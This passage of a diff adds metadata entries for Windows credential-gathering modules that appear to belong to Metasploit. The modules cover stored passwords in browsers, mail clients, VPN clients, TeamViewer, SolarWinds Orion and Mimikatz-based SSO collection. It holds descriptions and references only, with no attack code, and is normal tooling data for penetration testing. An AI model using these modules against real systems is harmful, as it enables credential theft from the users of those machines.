null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/opera.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/opera", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/operamail": { + "name": "Operamail credential gatherer", + "fullname": "post/windows/gather/credentials/operamail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Operamail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/operamail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/operamail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/outlook": { + "name": "Windows Gather Microsoft Outlook Saved Password Extraction", + "fullname": "post/windows/gather/credentials/outlook", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Justin Cacak" + ], + "description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/outlook.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/outlook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/plsql_developer": { + "name": "Windows Gather PL/SQL Developer Connection Credentials", + "fullname": "post/windows/gather/credentials/plsql_developer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Adam Caudill", + "Jemmy Wang" + ], + "description": "This module can decrypt the histories and connection credentials of PL/SQL Developer,\n and passwords are available if the user chooses to remember.", + "references": [ + "URL-https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-11-09 13:58:14 +0000", + "path": "/modules/post/windows/gather/credentials/plsql_developer.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/plsql_developer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/postbox": { + "name": "Postbox credential gatherer", + "fullname": "post/windows/gather/credentials/postbox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Postbox credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/postbox.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/postbox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/pulse_secure": { + "name": "Windows Pulse Secure Connect Client Saved Password Extractor", + "fullname": "post/windows/gather/credentials/pulse_secure", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Quentin Kaiser " + ], + "description": "This module extracts and decrypts saved Pulse Secure Connect Client passwords from the\n Windows Registry. This module can only access credentials created by the user that the\n Meterpreter session is running as.\n Note that this module cannot link the password to a username unless the\n Meterpreter sessions is running as SYSTEM. This is because the username associated\n with a password is saved in 'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\[SID].dat',\n which is only readable by SYSTEM.\n Note that for enterprise deployment, this username is almost always the domain\n username.", + "references": [ + "CVE-2020-8956", + "URL-https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials", + "URL-https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store", + "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/credentials/pulse_secure.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/pulse_secure", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/purevpn_cred_collector": { + "name": "Windows Gather PureVPN Client Credential Collector", + "fullname": "post/windows/gather/credentials/purevpn_cred_collector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Manuel Nader #AgoraSecurity" + ], + "description": "Finds the password stored for the PureVPN Client.", + "references": [ + "URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/", + "URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/purevpn_cred_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/qq": { + "name": "QQ credential gatherer", + "fullname": "post/windows/gather/credentials/qq", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for QQ credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/qq.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/qq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/quassel_irc": { + "name": "Quassel IRC credential gatherer", + "fullname": "post/windows/gather/credentials/quassel_irc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Quassel IRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/quassel_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/quassel_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/razer_synapse": { + "name": "Windows Gather Razer Synapse Password Extraction", + "fullname": "post/windows/gather/credentials/razer_synapse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Thomas McCarthy \"smilingraccoon\" ", + "Matt Howard \"pasv\" ", + "Brandon McCann \"zeknox\" " + ], + "description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and iv is publicly known. This module\n will not only extract encrypted password but will also decrypt\n password using public key. Affects versions earlier than 1.7.15.", + "references": [ + "URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/", + "URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/razer_synapse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/razorsql": { + "name": "Windows Gather RazorSQL Credentials", + "fullname": "post/windows/gather/credentials/razorsql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Paul Rascagneres ", + "sinn3r " + ], + "description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/razorsql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/razorsql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/rdc_manager_creds": { + "name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction", + "fullname": "post/windows/gather/credentials/rdc_manager_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/rdc_manager_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/redis_desktop_manager": { + "name": "RedisDesktopManager credential gatherer", + "fullname": "post/windows/gather/credentials/redis_desktop_manager", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for RedisDesktopManager credentials on a Windows host.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/redis_desktop_manager.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/redis_desktop_manager", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/safari": { + "name": "Safari credential gatherer", + "fullname": "post/windows/gather/credentials/safari", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for safari credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/safari.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/safari", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/seamonkey": { + "name": "Seamonkey credential gatherer", + "fullname": "post/windows/gather/credentials/seamonkey", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for seamonkey credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/seamonkey.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/seamonkey", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/securecrt": { + "name": "Windows SecureCRT Session Information Enumeration", + "fullname": "post/windows/gather/credentials/securecrt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "HyperSine", + "Kali-Team " + ], + "description": "This module will determine if SecureCRT is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.\n\n Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.", + "references": [ + "URL-https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/securecrt.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/securecrt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/skype": { + "name": "Windows Gather Skype Saved Password Hash Extraction", + "fullname": "post/windows/gather/credentials/skype", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix ", + "hdm " + ], + "description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5", + "references": [ + "URL-http://www.recon.cx/en/f/vskype-part2.pdf", + "URL-https://web.archive.org/web/20140207115406/http://insecurety.net/?p=427", + "URL-https://github.com/skypeopensource/tools" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/skype.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/skype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/smartermail": { + "name": "Windows Gather SmarterMail Password Extraction", + "fullname": "post/windows/gather/credentials/smartermail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joe Giron", + "bcoles ", + "sinn3r " + ], + "description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.", + "references": [ + "URL-http://www.gironsec.com/blog/tag/cracking-smartermail/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/smartermail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/smartermail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/smartftp": { + "name": "Windows Gather SmartFTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/smartftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module finds saved login credentials\n for the SmartFTP FTP client for windows.\n It finds the saved passwords and decrypts\n them.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/smartftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/smartftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/solarwinds_orion_dump": { + "name": "SolarWinds Orion Secrets Dump", + "fullname": "post/windows/gather/credentials/solarwinds_orion_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-08", + "type": "post", + "author": [ + "npm ", + "Rob Fuller" + ], + "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with SolarWinds Orion NPM installed. The module\n supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n extraction and decryption of the data are provided to allow session migration\n during execution in order to log in to the SQL database using SSPI. Tested on\n the 2020 version of SolarWinds Orion NPM. This module is possible only because\n of the source code and technical information published by Rob Fuller and\n Atredis Partners.", + "references": [ + "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/", + "URL-https://github.com/atredispartners/solarwinds-orion-cryptography" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/solarwinds_orion_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt SolarWinds Orion database export CSV file" + }, + { + "name": "Dump", + "description": "Export SolarWinds Orion database and perform decryption" + }, + { + "name": "Export", + "description": "Export SolarWinds Orion database without decryption" + } + ] + }, + "post_windows/gather/credentials/spark_im": { + "name": "Windows Gather Spark IM Password Extraction", + "fullname": "post/windows/gather/credentials/spark_im", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" " + ], + "description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract encrypted\n password but will also decrypt password using public key.", + "references": [ + "URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/spark_im.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/spark_im", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/srware": { + "name": "Srware credential gatherer", + "fullname": "post/windows/gather/credentials/srware", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Srware credentials on a Windows host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/srware.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/srware", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/sso": { + "name": "Windows Single Sign On Credential Collector (Mimikatz)", + "fullname": "post/windows/gather/credentials/sso", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/sso.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/sso", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/steam": { + "name": "Windows Gather Steam Client Session Collector.", + "fullname": "post/windows/gather/credentials/steam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nikolai Rusakov " + ], + "description": "This module will collect Steam session information from an\n account set to autologin.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/steam.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/steam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/sylpheed": { + "name": "Sylpheed email credential gatherer", + "fullname": "post/windows/gather/credentials/sylpheed", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Sylpheed email client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/sylpheed.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/sylpheed", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/tango": { + "name": "Tango credential gatherer", + "fullname": "post/windows/gather/credentials/tango", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tango credentials on a Windows host. Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tango.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tango", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/teamviewer_passwords": { + "name": "Windows Gather TeamViewer Passwords", + "fullname": "post/windows/gather/credentials/teamviewer_passwords", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nic Losby ", + "Kali-Team " + ], + "description": "This module will find and decrypt stored TeamViewer passwords", + "references": [ + "CVE-2019-18988", + "URL-https://whynotsecurity.com/blog/teamviewer/", + "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/teamviewer_passwords", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/thunderbird": { + "name": "Thunderbird credential gatherer", + "fullname": "post/windows/gather/credentials/thunderbird", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + 